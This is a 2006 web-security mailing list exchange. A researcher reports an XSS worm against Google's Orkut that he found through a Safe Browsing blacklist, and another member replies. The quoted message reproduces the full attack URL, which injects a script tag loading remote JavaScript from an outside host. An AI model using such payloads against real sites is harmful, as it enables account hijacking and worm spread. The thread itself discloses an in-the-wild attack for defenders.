[WEB SECURITY] XSS worm attacking Google?

pdp (architect) pdp.gnucitizen at googlemail.com
Sat Dec 9 19:45:53 EST 2006


Nice find. It seems that it is written by someone who speaks Spanish.
There was a discussion on sla.ckers.org about a vulnerability in orkut
I think... or was that somewhere else. Anyway, it is funny that
attackers came up with this worm so quickly since that is only a two-week-old
finding. It seems that bad guys are starting to realise the power of XSS
worms and their destructive potential. This is not good news!

On 12/9/06, Billy Hoffman <Billy.Hoffman at spidynamics.com> wrote:
> Folks,
>
> I was running through some proxy logs, and saw a reference to
> http://sb.google.com/safebrowsing/update
>
> Requesting redirected me to a blacklist of what look like phishing
> sites. However, all the way at the bottom was a reference to Google's
> Orkut site. Specifically the blacklist entry was for a GET-based XSS
> attack against Google's GLogin system.
>
> https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.as
> px?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.j
> s\'></script><!--
>
> If you request that URL, you get a 403 error page saying your query is
> from an automated attack. Looks very similar to a page Google returned
> during the Perl.Santy attack a year or so back.
>
> The JavaScript source code to the attack is still available at
> http://www.probranco.net/xmen.js
>
> Enjoy,
> Billy Hoffman
> --
> Lead Researcher, SPI Labs
> SPI Dynamics Inc. - http://www.spidynamics.com
> Phone:  678-781-4800
> Direct: 678-781-4845
>
>
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
>
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
